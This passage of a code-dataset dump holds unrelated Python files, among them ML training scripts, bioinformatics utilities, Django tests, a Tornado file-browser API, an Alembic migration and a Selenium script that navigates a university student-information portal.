(GRU) based model. This script is the interface to the training module. \n\"\"\"\n\n\nclass TrainModule:\n \"\"\"\n Train module that provides an interface to the train method of HELEN.\n \"\"\"\n def __init__(self, train_file, test_file, gpu_mode, max_epochs, batch_size, num_workers,\n retrain_model, retrain_model_path, model_dir, stats_dir):\n self.train_file = train_file\n self.test_file = test_file\n self.gpu_mode = gpu_mode\n self.log_directory = log_dir\n self.model_dir = model_dir\n self.epochs = max_epochs\n self.batch_size = batch_size\n self.num_workers = num_workers\n self.retrain_model = retrain_model\n self.retrain_model_path = retrain_model_path\n self.stats_dir = stats_dir\n self.hidden_size = TrainOptions.HIDDEN_SIZE\n self.gru_layers = TrainOptions.GRU_LAYERS\n self.learning_rate = 0.0001\n self.weight_decay = 0\n\n def train_model(self):\n # train a model\n model, optimizer, stats_dictionary = train(self.train_file,\n self.test_file,\n self.batch_size,\n self.epochs,\n self.gpu_mode,\n self.num_workers,\n self.retrain_model,\n self.retrain_model_path,\n self.gru_layers,\n self.hidden_size,\n self.learning_rate,\n self.weight_decay,\n self.model_dir,\n self.stats_dir,\n not_hyperband=True)\n\n return model, optimizer, stats_dictionary\n\n\nif __name__ == '__main__':\n '''\n Processes arguments and performs tasks.\n '''\n parser = argparse.ArgumentParser()\n parser.add_argument(\n \"--train_file\",\n type=str,\n required=True,\n help=\"Training data description csv file.\"\n )\n parser.add_argument(\n \"--test_file\",\n type=str,\n required=True,\n help=\"Training data description csv file.\"\n )\n parser.add_argument(\n \"--batch_size\",\n type=int,\n required=False,\n default=100,\n help=\"Batch size for training, default is 100.\"\n )\n parser.add_argument(\n \"--epoch_size\",\n type=int,\n required=False,\n default=10,\n help=\"Epoch size for training iteration.\"\n )\n parser.add_argument(\n \"--model_out\",\n type=str,\n required=False,\n default='./model',\n help=\"Path and file_name to save model, default is ./model\"\n )\n parser.add_argument(\n \"--retrain_model\",\n type=bool,\n default=False,\n 
help=\"If true then retrain a pre-trained model.\"\n    )\n    parser.add_argument(\n        \"--retrain_model_path\",\n        type=str,\n        default=False,\n        help=\"Path to the model that will be retrained.\"\n    )\n    parser.add_argument(\n        \"--gpu_mode\",\n        type=bool,\n        default=False,\n        help=\"If true then cuda is on.\"\n    )\n    parser.add_argument(\n        \"--num_workers\",\n        type=int,\n        required=False,\n        default=16,\n        help=\"Number of workers to assign to the dataloader.\"\n    )\n    FLAGS, unparsed = parser.parse_known_args()\n    model_out_dir, log_dir = FileManager.handle_train_output_directory(FLAGS.model_out)\n    tm = TrainModule(FLAGS.train_file, FLAGS.test_file, FLAGS.gpu_mode, FLAGS.epoch_size, FLAGS.batch_size,\n                     FLAGS.num_workers, FLAGS.retrain_model, FLAGS.retrain_model_path, model_out_dir, log_dir)\n    tm.train_model()\n","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":4484,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"161665116","text":"from Bio import SeqIO\nfrom random import randint\nfrom os.path import splitext\n\nBASES = [\"A\",\"C\",\"G\",\"T\"]\n\ndef replace_ns(fasta):\n    prefix, ext = splitext(fasta)\n    fa = [f for f in SeqIO.parse(open(fasta), 'fasta')][0]\n    title = fa.id\n    seq = str(fa.seq)\n    new_seq = \"\"\n    for base in seq:\n        if base == \"N\":\n            base = BASES[randint(0,3)]\n        new_seq += base\n\n    with open(prefix + \".NoN\" + ext, \"w\") as f:\n        f.write(\">\"+title+\"\\n\")\n        f.write(new_seq+ \"\\n\")\n\nreplace_ns(\"Mus_musculus.GRCm38.dna.chromosome.2.fa\")","sub_path":"replace_ns.py","file_name":"replace_ns.py","file_ext":"py","file_size_in_byte":553,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"458981433","text":"from django.test import TestCase\nfrom routeCalc.helpers.pathfinder import Pathfinder\n\n\nclass TestPathfinder(TestCase):\n    example = {\n        \"A\": [\"B\", \"C\"],\n        \"B\": [\"D\", \"E\"],\n        \"C\": [\"D\"],\n        \"D\": [\"E\"]\n    }\n\n    example_2 = {\n        \"A\": [\"B\", \"C\", \"D\", \"E\", \"F\"],\n        \"B\": [\"C\", \"G\"],\n        \"C\": [\"B\"],\n        \"D\": [\"G\", \"F\"],\n        \"E\": [],\n        \"F\": [\"H\", \"Q\"],\n        \"G\": [\"H\", \"N\"],\n        \"H\": [\"O\"],\n        \"O\": [\"P\"],\n        \"N\": [],\n        \"P\": [],\n        \"Q\": []\n    }\n\n    def test_pathfinder(self):\n        pathfinder = Pathfinder(self.example)\n\n        try:\n            self.assertIsNotNone(pathfinder.find(\"A\", \"B\"))\n        except Exception as e:\n            self.fail(str(e))\n\n    def test_pathfinder_2(self):\n        pathfinder = Pathfinder(self.example_2)\n\n        try:\n            self.assertIsNotNone(pathfinder.find(\"A\", \"Q\"))\n        except Exception as e:\n            self.fail(str(e))\n","sub_path":"tests/TestPathfinder.py","file_name":"TestPathfinder.py","file_ext":"py","file_size_in_byte":950,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"23219226","text":"from dataclasses import dataclass, field\nfrom typing import Optional\nfrom .air_submode_enumeration import AirSubmodeEnumeration\nfrom .bus_submode_enumeration import BusSubmodeEnumeration\nfrom .coach_submode_enumeration import CoachSubmodeEnumeration\nfrom .funicular_submode_enumeration import FunicularSubmodeEnumeration\nfrom .metro_submode_enumeration import MetroSubmodeEnumeration\nfrom .rail_submode_enumeration import RailSubmodeEnumeration\nfrom .snow_and_ice_submode_enumeration import SnowAndIceSubmodeEnumeration\nfrom .telecabin_submode_enumeration import TelecabinSubmodeEnumeration\nfrom .tram_submode_enumeration import TramSubmodeEnumeration\nfrom 
.water_submode_enumeration import WaterSubmodeEnumeration\n\n__NAMESPACE__ = \"http://www.netex.org.uk/netex\"\n\n\n@dataclass\nclass TransportSubmodeStructure:\n choice: Optional[object] = field(\n default=None,\n metadata={\n \"type\": \"Elements\",\n \"choices\": (\n {\n \"name\": \"AirSubmode\",\n \"type\": AirSubmodeEnumeration,\n \"namespace\": \"http://www.netex.org.uk/netex\",\n },\n {\n \"name\": \"BusSubmode\",\n \"type\": BusSubmodeEnumeration,\n \"namespace\": \"http://www.netex.org.uk/netex\",\n },\n {\n \"name\": \"CoachSubmode\",\n \"type\": CoachSubmodeEnumeration,\n \"namespace\": \"http://www.netex.org.uk/netex\",\n },\n {\n \"name\": \"FunicularSubmode\",\n \"type\": FunicularSubmodeEnumeration,\n \"namespace\": \"http://www.netex.org.uk/netex\",\n },\n {\n \"name\": \"MetroSubmode\",\n \"type\": MetroSubmodeEnumeration,\n \"namespace\": \"http://www.netex.org.uk/netex\",\n },\n {\n \"name\": \"TramSubmode\",\n \"type\": TramSubmodeEnumeration,\n \"namespace\": \"http://www.netex.org.uk/netex\",\n },\n {\n \"name\": \"TelecabinSubmode\",\n \"type\": TelecabinSubmodeEnumeration,\n \"namespace\": \"http://www.netex.org.uk/netex\",\n },\n {\n \"name\": \"RailSubmode\",\n \"type\": RailSubmodeEnumeration,\n \"namespace\": \"http://www.netex.org.uk/netex\",\n },\n {\n \"name\": \"WaterSubmode\",\n \"type\": WaterSubmodeEnumeration,\n \"namespace\": \"http://www.netex.org.uk/netex\",\n },\n {\n \"name\": \"SnowAndIceSubmode\",\n \"type\": SnowAndIceSubmodeEnumeration,\n \"namespace\": \"http://www.netex.org.uk/netex\",\n },\n ),\n }\n )\n","sub_path":"netex/models/transport_submode_structure.py","file_name":"transport_submode_structure.py","file_ext":"py","file_size_in_byte":2991,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"42344058","text":"\"\"\"\nViews for the Mover objects.\nThis currently includes ??? 
objects.\n\"\"\"\nfrom .common_object import get_object, create_or_update_object\n\nfrom cornice import Service\n\nenv = Service(name='mover', path='/mover*obj_id',\n              description=\"Mover API\")\n\nimplemented_types = ('gnome.movers.simple_mover.SimpleMover',\n                     'gnome.movers.wind_movers.WindMover',\n                     'gnome.movers.wind_movers.GridWindMover',\n                     'gnome.movers.random_movers.RandomMover',\n                     'gnome.movers.random_movers.RandomVerticalMover',\n                     'gnome.movers.current_movers.CatsMover',\n                     'gnome.movers.current_movers.ComponentMover',\n                     'gnome.movers.current_movers.GridCurrentMover',\n                     'gnome.movers.vertical_movers.RiseVelocityMover',\n                     )\n\n\n@env.get()\ndef get_mover(request):\n    '''Returns a Gnome Mover object in JSON.'''\n    return get_object(request, implemented_types)\n\n\n@env.put()\ndef create_or_update_mover(request):\n    '''Creates or Updates a Mover object.'''\n    return create_or_update_object(request, implemented_types)\n","sub_path":"web/gnome/webgnome_data/webgnome_data/views/mover.py","file_name":"mover.py","file_ext":"py","file_size_in_byte":1174,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"481600964","text":"import sys; readline = sys.stdin.readline\nN, M = map(int,readline().split())\nadj = [[0]*(N+1) for _ in range(N+1)]\nfor _ in range(M):\n    i, j = map(int,readline().split())\n    adj[i][j] = 1\n    adj[j][i] = 1\n\nfor k in range(1,N+1):\n    for x in range(1,N+1):\n        for y in range(1,N+1):\n            if x == k or y == k or x == y:\n                continue\n            if adj[x][k] and adj[k][y]:\n                if adj[x][y]:\n                    adj[x][y] = min(adj[x][y], adj[x][k]+adj[k][y])\n                else:\n                    adj[x][y] = adj[x][k]+adj[k][y]\n\nanw_list = []\nmin_v = 1000000\nmin_idx = 0\nfor idx in range(N,0,-1):\n    v = adj[idx]\n    tmp = sum(v)\n    if tmp <= min_v:\n        min_v = tmp\n        min_idx = idx\n\n#print(adj)\nprint(min_idx)","sub_path":"BOJ/graph/1389.py","file_name":"1389.py","file_ext":"py","file_size_in_byte":764,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"589176040","text":"\"\"\"\nVisualize data.\n\"\"\"\nimport os\nfrom glob import glob\nimport argparse\nimport numpy as np\nimport cv2\n\n\ndef draw_points(img, points, color=(255, 0, 0)):\n    \"\"\"\n\n    Args:\n        img (np.ndarray): Array of an image.\n        points (list or PointList): An instance containing key-points.\n        color (tuple): BGR color.\n\n    \"\"\"\n\n    for p in points:\n        x, y = p\n        cv2.circle(img, (x, y), 2, color, 2)\n\n\ndef main():\n    parser = argparse.ArgumentParser()\n    parser.add_argument('img_dir', type=str,\n                        help='Path to the directory of input images.')\n    parser.add_argument('keypoints_dir', type=str,\n                        help='Path to the directory of input keypoints files.')\n    args = parser.parse_args()\n\n    img_paths = sorted(glob(os.path.join(args.img_dir, '*')))\n    keypoints_paths = sorted(glob(os.path.join(args.keypoints_dir, '*')))\n    for img_path, keypoints_path in zip(img_paths, keypoints_paths):\n        img = cv2.imread(img_path)\n        data = np.loadtxt(keypoints_path, delimiter=',').astype(int)\n        keypoints = (data[:, :2]).tolist()\n        print('============================')\n        print(os.path.basename(img_path))\n        print(os.path.basename(keypoints_path))\n        draw_points(img, keypoints)\n        cv2.imshow('img', img)\n        key = cv2.waitKey(0) & 0xff\n        if key == ord('q'):\n            break\n\n\nif __name__ == '__main__':\n    
main()\n","sub_path":"support_tools/visualize_data.py","file_name":"visualize_data.py","file_ext":"py","file_size_in_byte":1426,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"33488623","text":"#!/usr/bin/env python\n\nimport os\nimport os.path\nimport logging\nimport random\nimport string\nimport tornado.httpserver\nimport tornado.ioloop\nimport tornado.options\nimport tornado.web\n\nfrom tornado.escape import json_decode, native_str\n\nfrom postgres import Postgres\nfrom postgres.orm import Model\nfrom route import route\n\n\nfrom tornado.options import define, options\n\ndefine(\"port\", default=8000, help=\"run on the given port\", type=int)\ndefine('debug', default=True, help=\"run in debug mode\", type=bool)\n\n\nclass Application(tornado.web.Application):\n\n def __init__(self, debug):\n base_dir = os.path.dirname(__file__)\n\n handlers = [\n ] + route.routes()\n\n settings = {\n \"title\": \"Simple File Browser\",\n \"static_path\": os.path.join(base_dir, \"static\"),\n \"debug\": debug\n }\n\n super(Application, self).__init__(handlers, **settings)\n # Have one global connection to the DB across all handlers\n self.db = self.initdb(self.env)\n\n def initdb(self, env):\n db_dsn = env.get('db_dsn')\n maxconn = env.get('db_maxconn')\n db = Postgres(db_dsn, maxconn=maxconn)\n db.register_model(Node)\n\n return db\n\n @property\n def env(self):\n return dict(\n db_dsn=os.environ.get('DB_DSN'),\n db_maxconn=os.environ.get('DB_MAXCONN')\n )\n\n\nclass BaseHandler(tornado.web.RequestHandler):\n \"\"\"simple output for xapplication-json only.\n \"\"\"\n\n @property\n def db(self):\n return self.application.db\n\n def prepare(self):\n # Incorporate request JSON into arguments dictionary.\n self.json_arguments = {}\n content_type = self.request.headers.get(\"Content-Type\", \"\")\n if content_type.startswith(\"application/json\") and self.request.body:\n try:\n self.json_arguments = json_decode(self.request.body)\n except ValueError:\n message = 'Unable to parse JSON.'\n self.send_error(400, message=message) # Bad Request\n\n def get_json_argument(self, name, default):\n args = self.json_arguments\n if not args:\n if default is self._ARG_DEFAULT:\n raise tornado.web.MissingArgumentError(name)\n return default\n name = native_str(name)\n return args[name]\n\n def finish(self, chunk=None, status_code=None):\n \"\"\"Finishes this response, ending the HTTP request.\"\"\"\n if self._finished:\n raise RuntimeError(\"finish() called twice\")\n\n if chunk is None:\n chunk = {}\n\n status_code = status_code or self._status_code\n if status_code > 200:\n self.set_status(status_code)\n\n isinstance(chunk, dict) and chunk.update({\n 'code': status_code,\n 'request': \" \".join((self.request.method, self.request.path))\n })\n\n self.write(chunk)\n\n # Automatically support ETags and add the Content-Length header if\n # we have not flushed any content yet.\n if not self._headers_written:\n if (self._status_code == 200 and\n self.request.method in (\"GET\", \"HEAD\") and\n \"Etag\" not in self._headers):\n self.set_etag_header()\n if self.check_etag_header():\n self._write_buffer = []\n self.set_status(304)\n if self._status_code == 304:\n assert not self._write_buffer, \"Cannot send body with 304\"\n self._clear_headers_for_304()\n elif \"Content-Length\" not in self._headers:\n content_length = sum(len(part) for part in self._write_buffer)\n self.set_header(\"Content-Length\", content_length)\n\n if hasattr(self.request, \"connection\"):\n # Now 
that the request is finished, clear the callback we\n # set on the HTTPConnection (which would otherwise prevent the\n # garbage collection of the RequestHandler when there\n # are keepalive connections)\n self.request.connection.set_close_callback(None)\n\n self.flush(include_footers=True)\n self.request.finish()\n self._log()\n self._finished = True\n self.on_finish()\n # Break up a reference cycle between this handler and the\n # _ui_module closures to allow for faster GC on CPython.\n self.ui = None\n\n\n@route(r\"/api/node/([0-9]+)\", name=\"node\")\nclass NodeHandler(BaseHandler):\n\n def post(self, id):\n parent = Node.from_id(id)\n if not parent or parent.permission>0:\n self.finish(status_code=403)\n return\n\n name = self.get_json_argument('name', None)\n permission = 0\n parent_id = id\n\n # for file upload @p => permission number\n if int(self.get_query_argument('p', 0)) == 1:\n payload = self.request.files.get('file', [{}])[0]\n if not payload:\n self.finish(status_code=403)\n return\n\n name = payload['filename']\n permission = 1\n\n extension = os.path.splitext(name)[1]\n random_name = ''.join(random.choice(\n string.ascii_lowercase + string.digits) for x in xrange(6))\n file_path = os.path.join(self.settings['static_path'],\n random_name+extension)\n with open(file_path, \"wb\") as fp:\n fp.write(payload['body'])\n\n node_info = dict(\n name=name, permission=permission, parent_id=parent_id)\n node = Node.insert(**node_info)\n\n if not node:\n self.finish(status_code=403)\n return\n\n self.finish({'node': node.node_info}, status_code=201)\n\n def put(self, id):\n child_id = self.get_json_argument('nid', 0)\n child = Node.from_id(child_id)\n if child:\n node = Node.from_id(id)\n if node and node.permission is 0 and \\\n node.id is not child.parent_id:\n child.set_parent(node.id)\n self.finish({'node': node.node_info})\n return\n\n self.finish(status_code=403)\n\n def delete(self, id):\n node = Node.from_id(id)\n if not node:\n self.finish(status_code=403)\n return\n\n node.delete()\n self.finish()\n\n\n@route(r\"/api/(.*)\", name=\"node-path\")\nclass NodePathHandler(BaseHandler):\n\n def get(self, filename):\n path = filename.strip(os.sep) or None\n node = Node.from_path(path)\n nodes = []\n node_info = node.node_info if node else {}\n if node and node.permission is 0:\n nodes = node.children_from_parent_id(node.id)\n\n self.finish({'children': nodes, 'node': node_info})\n\n\nclass Node(Model):\n \"\"\"Represent a SFB node.\n \"\"\"\n\n typname = \"nodes\"\n\n def __eq__(self, other):\n if not isinstance(other, Participant):\n return False\n return self.id == other.id\n\n def __ne__(self, other):\n if not isinstance(other, Participant):\n return True\n return self.id != other.id\n\n def __repr__(self):\n return '' % repr(self.name)\n\n @classmethod\n def from_id(cls, id):\n return cls.db.one(\"\"\"\n SELECT node.*::nodes\n FROM nodes AS node\n WHERE node.id=%s\n \"\"\", (id,))\n\n # tree behavior\n\n @classmethod\n def from_path(cls, path):\n \"\"\"Find the node from given path.\n \"\"\"\n parsed_path = path.split(os.sep) if path else []\n depth = len(parsed_path)\n name = parsed_path[-1] if depth else os.sep\n\n return cls.db.one(\"\"\"\n SELECT node.*::nodes\n FROM nodes AS node\n , (SELECT node.id, (COUNT(parent.name)-1) AS depth\n FROM nodes AS node\n , nodes AS parent\n WHERE node.lft BETWEEN parent.lft AND parent.rght\n AND node.name=%(name)s\n GROUP BY node.id\n ) AS tree\n WHERE tree.id=node.id\n AND tree.depth=%(depth)s\n \"\"\", dict(name=name, depth=depth))\n\n 
@classmethod\n def insert(cls, **fields):\n try:\n with cls.db.get_cursor() as c:\n r = c.one(\"\"\"\n INSERT INTO nodes\n (name, permission, parent_id)\n VALUES (%(name)s, %(permission)s, %(parent_id)s)\n RETURNING nodes.*::nodes\n \"\"\", fields)\n return r\n except Exception as e:\n # Duplicated name exception raised at db procedure\n return None\n\n def delete(self):\n with self.db.get_cursor() as c:\n width = self.rght - self.lft + 1\n\n c.run(\"DELETE FROM nodes WHERE lft BETWEEN %s AND %s\",\n (self.lft, self.rght))\n c.run(\"UPDATE nodes SET rght=rght-%s WHERE rght>%s\",\n (width, self.rght))\n c.run(\"UPDATE nodes SET lft=lft-%s WHERE lft>%s\",\n (width, self.rght))\n return\n\n def set_parent(self, parent_id):\n self.db.run(\"UPDATE nodes SET parent_id=%s WHERE id=%s\",\n (parent_id, self.id))\n self.set_attributes(parent_id=parent_id)\n\n# def children_from_path(self, path):\n# \"\"\"Find the immediate subordinates of a node\n# \"\"\"\n# parsed_path = path.split(os.sep)\n# return self.db.all(\"\"\"\n# SELECT child.*\n# FROM nodes AS child\n# , nodes AS parent\n# , (SELECT child.id, (COUNT(parent.name)-1) AS depth\n# FROM nodes AS child\n# , nodes AS parent\n# WHERE child.lft BETWEEN parent.lft AND parent.rght\n# AND child.name=%(name)s\n# GROUP BY child.id\n# ) AS tree\n# WHERE tree.id=parent.id\n# AND tree.depth=%(depth)s\n# AND child.parent_id=parent.id\n# ORDER BY child.lft\n# \"\"\", dict(name=parsed_path[-1], depth=len(parsed_path)), default=[])\n\n @property\n def node_info(self):\n return {\n 'id': self.id,\n 'name': self.name,\n 'permission': self.permission,\n 'parent_id': self.parent_id,\n 'lft': self.lft,\n 'rght': self.rght\n }\n\n def children_from_parent_id(self, parent_id):\n return self.db.all(\"\"\"\n\n SELECT n.*\n FROM nodes AS n\n WHERE n.parent_id=%s\n ORDER BY n.lft ASC\n \"\"\", (parent_id,), back_as=dict)\n\n\ndef main():\n \"\"\"Start SFB server.\n \"\"\"\n tornado.options.parse_command_line()\n http_server = tornado.httpserver.HTTPServer(Application(options.debug),\n xheaders=True)\n http_server.listen(options.port)\n try:\n logging.info(\"SFB server [%s] start..\" % (options.port,))\n tornado.ioloop.IOLoop.current().start()\n except KeyboardInterrupt:\n logging.warn(\"SFB server [%s] interrupted.\" % (options.port,))\n\n\nif __name__ == \"__main__\":\n main()","sub_path":"service.py","file_name":"service.py","file_ext":"py","file_size_in_byte":11276,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"496784578","text":"import os\nimport numpy as np\nfrom tensorflow.keras.models import Model\nfrom tensorflow.keras.metrics import Precision, Recall\nfrom datetime import datetime as dt\nfrom pytz import timezone\nfrom tqdm.auto import tqdm\nfrom functools import cmp_to_key\nimport pandas as pd\nfrom sklearn.metrics import confusion_matrix\n\nfrom module.data_loader import DataLoader\n\n\npd.set_option('display.max_columns', None)\npd.set_option('display.width', 200)\n\n\ndef calc_f1score(precision, recall):\n return 2 * precision * recall / (precision + recall + 1e-7)\n\n\nclass ModelMetric:\n def __init__(self, epoch, loss, accuracy, precision, recall, checkpoint=None):\n self.epoch = epoch\n self.loss = loss\n self.accuracy = accuracy\n self.precision = precision\n self.recall = recall\n self.f1score = calc_f1score(precision, recall)\n self.checkpoint = checkpoint\n\n @staticmethod\n def compare(a, b):\n \"\"\" f1score, accuracy, loss를 각각 1, 2, 3순위로 하여 비교.\n a의 metric이 b의 것보다 더 좋으면 1, 같으면 0, 나쁘면 -1을 반환 
\"\"\"\n if a.f1score > b.f1score:\n return 1\n elif a.f1score == b.f1score:\n if a.accuracy > b.accuracy:\n return 1\n elif a.accuracy == b.accuracy:\n if a.loss < b.loss:\n return 1\n elif a.loss == b.loss:\n return 0\n return -1\n\n\nclass Trainer:\n def __init__(self, model: Model, data_loader: DataLoader, ckpt_dir):\n self.model = model\n self.data_loader = data_loader\n self.ckpt_dir = ckpt_dir\n\n if not os.path.exists(ckpt_dir):\n os.makedirs(ckpt_dir)\n\n def test(self, batch_size):\n self.model.reset_metrics()\n\n # progress bar와 metric 표시를 위한 tqdm 생성\n batch_generator = self.data_loader.iter_test_batch_data(batch_size)\n batch_count = self.data_loader.get_test_batch_count(batch_size)\n description = f'Test'\n with tqdm(batch_generator, total=batch_count, desc=description) as pbar:\n # batch 수만큼 반복\n for x, y in pbar:\n loss, accuracy, precision, recall = self.model.test_on_batch(x, y, reset_metrics=False)\n f1score = calc_f1score(precision, recall)\n\n # print metrics\n metric_str = f'loss: {loss:.4f}, accuracy: {accuracy:.4f}, precision: {precision:.4f}, recall: {recall:.4f}, f1score: {f1score:.4f}'\n pbar.set_postfix_str(metric_str)\n\n return loss, accuracy, precision, recall, f1score\n\n def test_prediction(self, batch_size):\n y_pred_list = []\n\n batch_generator = self.data_loader.iter_test_batch_data(batch_size)\n batch_count = self.data_loader.get_test_batch_count(batch_size)\n description = f'Test'\n with tqdm(batch_generator, total=batch_count, desc=description) as pbar:\n # batch 수만큼 반복\n for x in pbar:\n pred = self.model.predict_on_batch(x)\n pred = pred if isinstance(pred, np.ndarray) else pred.numpy()\n y_pred = (pred > 0.5) * 1\n y_pred_list.append(y_pred.squeeze())\n return np.hstack(y_pred_list)\n\n def predict(self, batch_size):\n y_pred_list = []\n for x, _ in self.data_loader.iter_test_batch_data(batch_size):\n pred = self.model.predict_on_batch(x)\n pred = pred.numpy() if not isinstance(pred, np.ndarray) else pred\n y_pred = (pred > 0.5) * 1\n\n y_pred_list.append(y_pred.squeeze())\n\n return np.concatenate(y_pred_list)\n","sub_path":"test/module/trainer.py","file_name":"trainer.py","file_ext":"py","file_size_in_byte":3675,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"305322700","text":"import argparse\nimport os\n\nfrom jooble_transformer.transformer import Transformer\n\n\nparser = argparse.ArgumentParser(\n description='Transforms `train` and `test` tsvs.'\n ' See repo README for details on how to run from docker')\nparser.add_argument('--data-path', default='/tmp/jooble_test_task_data')\n\n\nif __name__ == '__main__':\n args = parser.parse_args()\n Transformer(data_path=args.data_path).transform()\n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":433,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"405959066","text":"import os\nimport csv\n\n\n\n\ndef create_indexable(chrom, fle):\n\tchromdata = list(csv.reader(open('/home/vdp5/data/gene_finder/vir_bychrom_ASM241v2/{}/{}'.format(chrom, fle)),delimiter='\\t'))\n\tstringineed = chromdata[-1][0]\n\treturn stringineed\n\n\nexitfle = open('/home/vdp5/data/cdna_analysis_ASM241_v2/gene2exon_ASM241_v2.txt', 'w')\nrootdir = '/home/vdp5/data/cdna_analysis_ASM241_v2/vir_genes'\nflag_file = open('/home/vdp5/data/cdna_analysis_ASM241_v2/flagged_genes.txt', 'w')\n\ngene2exons = {}\n\nfor subdir, dirs, files in os.walk(rootdir):\n\tsortedfles = sorted(files)\n\tif 
len(sortedfles)!=2:\n\t\tcontinue\n\ttmp = list(csv.reader(open(os.path.join(subdir, sortedfles[0])),delimiter='\\t'))\n\tholder = sortedfles[0][:-7].split('_')[-2:]\n\tchrom_file_search = '_'.join(holder)\n\tfastaname = sortedfles[0][:-7] + '.fasta'\n\tchrombyindex = create_indexable(chrom_file_search, fastaname)\n\tgene='_'.join(sortedfles[0].split('_')[:2])\n\texonnums = []\n\ttmplst = []\n\tfor alpha in tmp:\n\t\tif len(alpha) == 0: continue\n\t\tif 'Exon' in alpha[0]:\n\t\t\tdata = alpha[0].split(' ')\n\t\t\tif float(data[-1]) < 0.95:\n\t\t\t\tcontinue\n\t\t\tindices = [int(a) for a in data[3].split('(')[-1].split(',')[0].split('-')]\n\t\t\ttmplst.append('>{}_exon{}\\n{}'.format(gene, data[2], chrombyindex[indices[0]-1:indices[1]]))\n\n\t\t\texonnums.append(int(data[2]))\n\ttmplst = sorted(tmplst)\n\tif len(tmplst) != len(list(set(exonnums))):\n\t\tflag_file.write('{}\\n'.format(gene))\n\t\tcontinue\n\texitfle.write('\\n'.join(tmplst) + '\\n')\n\n\nexitfle.close()\nflag_file.close()\n","sub_path":"predrake_scripts/create_exonic_directory_ASM241_v2.py","file_name":"create_exonic_directory_ASM241_v2.py","file_ext":"py","file_size_in_byte":1498,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"180861408","text":"# Scrape SIS for Major Requirements\n# I don't like Ruby\n\nfrom bs4 import BeautifulSoup\nimport requests\nimport logging\nfrom selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.common.action_chains import ActionChains\nimport time\n\nURL=\"https://sisuva.admin.virginia.edu/psp/ihprd/EMPLOYEE/EMPL/h/?tab=PAPP_GUEST\"\nHEADERS = {'user-agent' : 'Chrome/51.0.2 (Macintosh; Intel Mac OS X 10.11.5); FUCKSIS123/wastingmytime@email.com'}\n\ndef search_ps(driver, query):\n\tpage_source = driver.page_source.encode('utf-8')\n\treturn query in page_source\n\nlogging.basicConfig(filename='log.out',level=logging.DEBUG)\t\nlogging.debug(\"opening browser\")\ndriver = webdriver.Chrome('/Users/cood/code/chromedriver')\ndriver.get(URL)\n\nlogging.debug(\"wait for login button to be displayed\")\nwait = WebDriverWait(driver, 10)\nwait.until(EC.element_to_be_clickable((By.NAME,'Netbadge')))\nlogging.debug(\"click on login button\")\ndriver.find_element_by_name('Netbadge').click()\n\nlogging.debug(\"logging in\")\nwith open('credentials', 'r') as f:\n\tcreds = f.read()\n\tusername,password = creds.split(':')\n\ndriver.find_element_by_name(\"user\").send_keys(username)\ndriver.find_element_by_name(\"pass\").send_keys(password)\n\nlogging.debug(\"waiting for iframe\")\nwait.until(EC.frame_to_be_available_and_switch_to_it((By.TAG_NAME, \"iframe\")))\n\nlogging.debug(\"select what-if report from dropdown\")\nwait.until(EC.presence_of_all_elements_located((By.NAME, \"DERIVED_SSS_SCL_SSS_MORE_ACADEMICS\")))\ndriver.find_element_by_name(\"DERIVED_SSS_SCL_SSS_MORE_ACADEMICS\").send_keys('w')\ndriver.execute_script(\"javascript:submitAction_win0(document.win0,'DERIVED_SSS_SCL_SSS_GO_1');\")\n\nlogging.debug(\"waiting for next page to load\")\n# Ruby will switch back to default content on new page load. 
interesting...\ndriver.switch_to_default_content()\nframe = driver.find_element_by_tag_name(\"iframe\")\ndriver.switch_to_frame(frame)\n'''\niframes = driver.find_elements_by_tag_name('iframe')\nfor f in iframes:\n\tprint('in loop')\n\tprint(f.get_attribute('outerHTML'))\n\tprint(\"\\n\\n\\n\\n\")\n'''\n#wait.until(driver.find_element_by_name(\"DERIVED_SAAWHIF_SSS_CREATE_NEW\").is_displayed)\n#driver.find_element_by_name(\"DERIVED_SAAWHIF_SSS_CREATE_NEW\").click\nprint(driver.page_source.encode('utf-8'))\n\n\n\n\n\n\t\n","sub_path":"sis.py","file_name":"sis.py","file_ext":"py","file_size_in_byte":2431,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"580527887","text":"\"\"\"empty message\n\nRevision ID: 4eae7061c50c\nRevises: 2ea0c270256a\nCreate Date: 2016-01-28 14:41:02.229555\n\n\"\"\"\n\n# revision identifiers, used by Alembic.\nrevision = '4eae7061c50c'\ndown_revision = '2ea0c270256a'\n\nfrom alembic import op\nimport sqlalchemy as sa\n\n\ndef upgrade():\n ### commands auto generated by Alembic - please adjust! ###\n op.add_column('category', sa.Column('view_count', sa.Integer(), nullable=True))\n op.add_column('service', sa.Column('view_count', sa.Integer(), nullable=True))\n ### end Alembic commands ###\n\n\ndef downgrade():\n ### commands auto generated by Alembic - please adjust! ###\n op.drop_column('service', 'view_count')\n op.drop_column('category', 'view_count')\n ### end Alembic commands ###\n","sub_path":"server/migrations/versions/4eae7061c50c_.py","file_name":"4eae7061c50c_.py","file_ext":"py","file_size_in_byte":744,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"306873202","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport pandas as pd\nfrom collections import 